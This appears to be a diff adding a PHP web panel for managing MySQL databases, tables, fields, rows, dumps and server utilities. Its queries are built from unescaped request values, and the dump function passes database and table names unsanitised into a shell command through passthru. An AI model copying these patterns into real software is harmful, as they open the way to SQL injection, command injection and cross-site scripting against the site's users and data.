+  echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+  echo "</tr>\n";
+}
+echo "</table>\n";
+}
+
+function createDatabase() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+mysql_create_db( $dbname, $mysqlHandle );
+listDatabases();
+}
+
+function dropDatabase() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+mysql_drop_db( $dbname, $mysqlHandle );
+listDatabases();
+}
+
+function listTables() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+echo "<h1>Table List</h1>\n";
+echo "<p class=location>$dbname</p>\n";
+echoQueryResult();
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=createTable>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=text name=tablename>\n";
+echo "<input type=submit value='Create Table'>\n";
+echo "</form>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=query>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=text size=40 name=queryStr>\n";
+//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+echo "<input type=submit value='Query'>\n";
+echo "</form>\n";
+echo "<hr>\n";
+
+$pTable = mysql_list_tables( $dbname );
+
+if( $pTable == 0 ) {
+  $msg  = mysql_error();
+  echo "<h3>Error : $msg</h3><p>\n";
+  return;
+}
+$num = mysql_num_rows( $pTable );
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+
+for( $i = 0; $i < $num; $i++ ) {
+  $tablename = mysql_tablename( $pTable, $i );
+
+  echo "<tr>\n";
+  echo "<td>\n";
+  echo "$tablename\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+  echo "</td>\n";
+  echo "</tr>\n";
+}
+
+echo "</table>";
+}
+
+function createTable() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "CREATE TABLE $tablename ( no INT )";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+listTables();
+}
+
+function dropTable() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "DROP TABLE $tablename";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+listTables();
+}
+
+function viewSchema() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+echo "<h1>Table Schema</h1>\n";
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+echoQueryResult();
+
+echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
+echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
+echo "<hr>\n";
+
+$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+$num = mysql_num_rows( $pResult );
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+echo "<tr>\n";
+echo "<th>Field</th>\n";
+echo "<th>Type</th>\n";
+echo "<th>Null</th>\n";
+echo "<th>Key</th>\n";
+echo "<th>Default</th>\n";
+echo "<th>Extra</th>\n";
+echo "<th colspan=2>Action</th>\n";
+echo "</tr>\n";
+
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  echo "<tr>\n";
+  echo "<td>".$field["Field"]."</td>\n";
+  echo "<td>".$field["Type"]."</td>\n";
+  echo "<td>".$field["Null"]."</td>\n";
+  echo "<td>".$field["Key"]."</td>\n";
+  echo "<td>".$field["Default"]."</td>\n";
+  echo "<td>".$field["Extra"]."</td>\n";
+  $fieldname = $field["Field"];
+  echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
+  echo "</tr>\n";
+}
+echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+if( $cmd == "add" )
+  echo "<h1>Add Field</h1>\n";
+else if( $cmd == "edit" ) {
+  echo "<h1>Edit Field</h1>\n";
+  $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+  $num = mysql_num_rows( $pResult );
+  for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  if( $field["Field"] == $fieldname ) {
+    $fieldtype = $field["Type"];
+    $fieldkey = $field["Key"];
+    $fieldextra = $field["Extra"];
+    $fieldnull = $field["Null"];
+    $fielddefault = $field["Default"];
+    break;
+  }
+  }
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( strpos( $fieldtype, "(" ) ) {
+  if( $type == "enum" | $type == "set" ) {
+    $valuelist = strtok( " ()\n" );
+  } else {
+    $M = strtok( " (,)\n" );
+    if( strpos( $fieldtype, "," ) )
+    $D = strtok( " (,)\n" );
+  }
+  }
+}
+
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+echo "<form action=$PHP_SELF>\n";
+
+if( $cmd == "add" )
+  echo "<input type=hidden name=action value=addField_submit>\n";
+else if( $cmd == "edit" ) {
+  echo "<input type=hidden name=action value=editField_submit>\n";
+  echo "<input type=hidden name=old_name value=$fieldname>\n";
+}
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=hidden name=tablename value=$tablename>\n";
+
+echo "<h3>Name</h3>\n";
+echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+if( $cmd == "add" )
+  echo "<input type=submit value='Add Field'>\n";
+else if( $cmd == "edit" )
+  echo "<input type=submit value='Edit Field'>\n";
+echo "<input type=button value=Cancel onClick='history.back()'>\n";
+echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
+  $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
+
+if( $cmd == "add" )
+  $queryStr = "ALTER TABLE $tablename ADD $name ";
+else if( $cmd == "edit" )
+  $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+
+if( $M != "" )
+  if( $D != "" )
+  $queryStr .= "$type($M,$D) ";
+  else
+  $queryStr .= "$type($M) ";
+else if( $valuelist != "" ) {
+  $valuelist = stripslashes( $valuelist );
+  $queryStr .= "$type($valuelist) ";
+} else
+  $queryStr .= "$type ";
+
+$queryStr .= "$unsigned $zerofill $binary ";
+
+if( $default_value != "" )
+  $queryStr .= "DEFAULT '$default_value' ";
+
+$queryStr .= "$not_null $auto_increment";
+
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+// key change
+$keyChange = false;
+$result = mysql_query( "SHOW KEYS FROM $tablename" );
+$primary = "";
+while( $row = mysql_fetch_array($result) )
+  if( $row["Key_name"] == "PRIMARY" ) {
+  if( $row[Column_name] == $name )
+    $keyChange = true;
+  else
+    $primary .= ", $row[Column_name]";
+  }
+if( $primary_key == "PRIMARY KEY" ) {
+  $primary .= ", $name";
+  $keyChange = !$keyChange;
+}
+$primary = substr( $primary, 2 );
+if( $keyChange == true ) {
+  $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+  mysql_query( $q );
+  $queryStr .= "<br>\n" . $q;
+  $errMsg .= "<br>\n" . mysql_error();
+  $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+  mysql_query( $q );
+  $queryStr .= "<br>\n" . $q;
+  $errMsg .= "<br>\n" . mysql_error();
+}
+
+viewSchema();
+}
+
+function dropField() {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr , $mysqlHandle );
+$errMsg = mysql_error();
+
+viewSchema();
+}
+
+function viewData( $queryStr ) {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
+
+echo "<h1>Data in Table</h1>\n";
+if( $tablename != "" )
+  echo "<p class=location>$dbname &gt; $tablename</p>\n";
+else
+  echo "<p class=location>$dbname</p>\n";
+
+$queryStr = stripslashes( $queryStr );
+if( $queryStr == "" ) {
+  $queryStr = "SELECT * FROM $tablename";
+  if( $orderby != "" )
+  $queryStr .= " ORDER BY $orderby";
+  echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
+  echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+}
+
+$pResult = mysql_db_query( $dbname, $queryStr );
+$errMsg = mysql_error();
+
+$GLOBALS[queryStr] = $queryStr;
+
+if( $pResult == false ) {
+  echoQueryResult();
+  return;
+}
+if( $pResult == 1 ) {
+  $errMsg = "Success";
+  echoQueryResult();
+  return;
+}
+
+echo "<hr>\n";
+
+$row = mysql_num_rows( $pResult );
+$col = mysql_num_fields( $pResult );
+
+if( $row == 0 ) {
+  echo "No Data Exist!";
+  return;
+}
+
+if( $rowperpage == "" ) $rowperpage = 20;
+if( $page == "" ) $page = 0;
+else $page--;
+mysql_data_seek( $pResult, $page * $rowperpage );
+
+echo "<table cellspacing=1 cellpadding=2>\n";
+echo "<tr>\n";
+for( $i = 0; $i < $col; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  echo "<th>";
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+  echo "</th>\n";
+}
+echo "<th colspan=2>Action</th>\n";
+echo "</tr>\n";
+
+for( $i = 0; $i < $rowperpage; $i++ ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  echo "<tr>\n";
+  $key = "";
+  for( $j = 0; $j < $col; $j++ ) {
+  $data = $rowArray[$j];
+
+  $field = mysql_fetch_field( $pResult, $j );
+  if( $field->primary_key == 1 )
+    $key .= "&" . $field->name . "=" . $data;
+
+  if( strlen( $data ) > 20 )
+    $data = substr( $data, 0, 20 ) . "...";
+  $data = htmlspecialchars( $data );
+  echo "<td>\n";
+  echo "$data\n";
+  echo "</td>\n";
+  }
+
+  if( $key == "" )
+  echo "<td colspan=2>no Key</td>\n";
+  else {
+  echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+  }
+  echo "</tr>\n";
+}
+echo "</table>\n";
+
+echo "<font size=2>\n";
+echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
+echo "<font color=green>\n";
+echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+echo "</font>\n";
+echo " | ";
+if( $page > 0 ) {
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+  if( $orderby != "" )
+  echo "&orderby=$orderby";
+  echo "'>Prev</a>\n";
+} else
+  echo "Prev";
+echo " | ";
+if( $page < ($row/$rowperpage)-1 ) {
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+  if( $orderby != "" )
+  echo "&orderby=$orderby";
+  echo "'>Next</a>\n";
+} else
+  echo "Next";
+echo " | ";
+if( $row > $rowperpage ) {
+  echo "<input type=text size=4 name=page>\n";
+  echo "<input type=submit value='Go'>\n";
+}
+echo "</form>\n";
+echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+if( $cmd == "add" )
+  echo "<h1>Add Data</h1>\n";
+else if( $cmd == "edit" ) {
+  echo "<h1>Edit Data</h1>\n";
+  $pResult = mysql_list_fields( $dbname, $tablename );
+  $num = mysql_num_fields( $pResult );
+
+  $key = "";
+  for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  if( $field->primary_key == 1 )
+    if( $field->numeric == 1 )
+    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+    else
+    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+  }
+  $key = substr( $key, 0, strlen($key)-4 );
+
+  mysql_select_db( $dbname, $mysqlHandle );
+  $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
+  $data = mysql_fetch_array( $pResult );
+}
+
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+echo "<form action='$PHP_SELF' method=post>\n";
+if( $cmd == "add" )
+  echo "<input type=hidden name=action value=addData_submit>\n";
+else if( $cmd == "edit" )
+  echo "<input type=hidden name=action value=editData_submit>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=hidden name=tablename value=$tablename>\n";
+echo "<table cellspacing=1 cellpadding=2>\n";
+echo "<tr>\n";
+echo "<th>Name</th>\n";
+echo "<th>Type</th>\n";
+echo "<th>Function</th>\n";
+echo "<th>Data</th>\n";
+echo "</tr>\n";
+
+$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+$num = mysql_num_rows( $pResult );
+
+$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  $fieldname = $field["Field"];
+  $fieldtype = $field["Type"];
+  $len = mysql_field_len( $pResultLen, $i );
+
+  echo "<tr>";
+  echo "<td>$fieldname</td>";
+  echo "<td>".$field["Type"]."</td>";
+  echo "<td>\n";
+  echo "<select name=${fieldname}_function>\n";
+  echo "<option>\n";
+  echo "<option>ASCII\n";
+  echo "<option>CHAR\n";
+  echo "<option>SOUNDEX\n";
+  echo "<option>CURDATE\n";
+  echo "<option>CURTIME\n";
+  echo "<option>FROM_DAYS\n";
+  echo "<option>FROM_UNIXTIME\n";
+  echo "<option>NOW\n";
+  echo "<option>PASSWORD\n";
+  echo "<option>PERIOD_ADD\n";
+  echo "<option>PERIOD_DIFF\n";
+  echo "<option>TO_DAYS\n";
+  echo "<option>USER\n";
+  echo "<option>WEEKDAY\n";
+  echo "<option>RAND\n";
+  echo "</select>\n";
+  echo "</td>\n";
+  $value = htmlspecialchars($data[$i]);
+  if( $cmd == "add" ) {
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( $type == "enum" || $type == "set" ) {
+    echo "<td>\n";
+    if( $type == "enum" )
+    echo "<select name=$fieldname>\n";
+    else if( $type == "set" )
+    echo "<select name=$fieldname size=4 multiple>\n";
+    echo strtok( "'" );
+    while( $str = strtok( "'" ) ) {
+    echo "<option>$str\n";
+    strtok( "'" );
+    }
+    echo "</select>\n";
+    echo "</td>\n";
+  } else {
+    if( $len < 40 )
+    echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
+    else
+    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
+  }
+  } else if( $cmd == "edit" ) {
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( $type == "enum" || $type == "set" ) {
+    echo "<td>\n";
+    if( $type == "enum" )
+    echo "<select name=$fieldname>\n";
+    else if( $type == "set" )
+    echo "<select name=$fieldname size=4 multiple>\n";
+    echo strtok( "'" );
+    while( $str = strtok( "'" ) ) {
+    if( $value == $str )
+      echo "<option selected>$str\n";
+    else
+      echo "<option>$str\n";
+    strtok( "'" );
+    }
+    echo "</select>\n";
+    echo "</td>\n";
+  } else {
+    if( $len < 40 )
+    echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
+    else
+    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
+  }
+  }
+  echo "</tr>";
+}
+echo "</table><p>\n";
+if( $cmd == "add" )
+  echo "<input type=submit value='Add Data'>\n";
+else if( $cmd == "edit" )
+  echo "<input type=submit value='Edit Data'>\n";
+echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$pResult = mysql_list_fields( $dbname, $tablename );
+$num = mysql_num_fields( $pResult );
+
+mysql_select_db( $dbname, $mysqlHandle );
+if( $cmd == "add" )
+  $queryStr = "INSERT INTO $tablename VALUES (";
+else if( $cmd == "edit" )
+  $queryStr = "REPLACE INTO $tablename VALUES (";
+for( $i = 0; $i < $num-1; $i++ ) {
+  $field = mysql_fetch_field( $pResult );
+  $func = $GLOBALS[$field->name."_function"];
+  if( $func != "" )
+  $queryStr .= " $func(";
+  if( $field->numeric == 1 ) {
+  $queryStr .= $GLOBALS[$field->name];
+  if( $func != "" )
+    $queryStr .= "),";
+  else
+    $queryStr .= ",";
+  } else {
+  $queryStr .= "'" . $GLOBALS[$field->name];
+  if( $func != "" )
+    $queryStr .= "'),";
+  else
+    $queryStr .= "',";
+  }
+}
+$field = mysql_fetch_field( $pResult );
+if( $field->numeric == 1 )
+  $queryStr .= $GLOBALS[$field->name] . ")";
+else
+  $queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+mysql_query( $queryStr , $mysqlHandle );
+$errMsg = mysql_error();
+
+viewData( "" );
+}
+
+function deleteData() {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$pResult = mysql_list_fields( $dbname, $tablename );
+$num = mysql_num_fields( $pResult );
+
+$key = "";
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  if( $field->primary_key == 1 )
+  if( $field->numeric == 1 )
+    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+  else
+    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+}
+$key = substr( $key, 0, strlen($key)-4 );
+
+mysql_select_db( $dbname, $mysqlHandle );
+$queryStr =  "DELETE FROM $tablename WHERE $key";
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+viewData( "" );
+}
+
+function dump() {
+global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+if( $action == "dumpTable" )
+  $filename = $tablename;
+else
+  $filename = $dbname;
+
+header("Content-disposition: filename=$filename.sql");
+header("Content-type: application/octetstream");
+header("Pragma: no-cache");
+header("Expires: 0");
+
+$pResult = mysql_query( "show variables" );
+while( 1 ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  if( $rowArray[0] == "basedir" )
+  $bindir = $rowArray[1]."bin/";
+}
+
+passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" );
+}
+
+function utils() {
+global $PHP_SELF, $command;
+echo "<h1>Utilities</h1>\n";
+if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+  echo "<hr>\n";
+  echo "Show\n";
+  echo "<ul>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+  echo "</ul>\n";
+  echo "Flush\n";
+  echo "<ul>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+  if( $command == "flush_hosts" ) {
+  if( mysql_query( "Flush hosts" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+  if( $command == "flush_logs" ) {
+  if( mysql_query( "Flush logs" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
